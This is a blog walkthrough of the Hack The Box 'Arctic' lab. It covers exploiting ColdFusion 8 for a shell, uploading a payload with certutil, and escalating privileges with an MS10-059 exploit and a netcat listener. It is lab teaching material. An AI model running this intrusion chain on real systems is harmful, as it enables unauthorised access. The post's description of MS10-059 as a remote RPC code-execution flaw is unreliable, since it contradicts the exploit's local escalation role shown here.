HTB : Artic

Network Enumeration

To begin our exploration of the network, let’s initiate an nmap scan in order to identify all open ports.

Web Enumeration

Port 8500

While exploring port 8500 we come across the ADOBE COLDFUSION 8 admin page.

Adobe ColdFusion 8 is a web application development platform that allows developers to create dynamic, data-driven websites and web applications. It supports a variety of programming languages, including CFML, JavaScript, and SQL. Some of its features include server clustering, PDF document generation, and integration with other Adobe products like Flex and AIR. It was released in 2007 and is no longer supported by Adobe, as its end of life was in 2012.

Initial Foothold

Use searchsploit to find any known exploits.

Let’s use the RCE exploit.

Edit the source code with the required details.

Run the python script and we get a shell.

Windows Enumeration

We can get the user flag in the desktop directory.

Privilege escalation

Let’s use windows-exploit-suggester to get some clues. Copy the system info into a text file and run the suggester.

**If you have some issues running the exploit suggester use the following commands.

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2.7 get-pip.py
pip2.7 install xlrd==1.2.0

python2.7 windows-exploit-suggester.py --update

python2.7 windows-exploit-suggester.py --database 2023-03-30-mssb.xls --systeminfo sysinfo.txt

Let’s try the MS10-059 vulnerability.

MS10-059 is a security vulnerability addressed by Microsoft in August 2010. It affects the Remote Procedure Call (RPC) service in Windows operating systems and could allow remote attackers to execute arbitrary code on a targeted system. The vulnerability was rated as critical.


Upload the exploit to the victim machine.

certutil -urlcache -split -f exploit.exe

Before running the exploit run a netcat listener to receive the shell.

We get the admin shell and the root flag can be found in the desktop.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



Create a website or blog at WordPress.com

%d bloggers like this: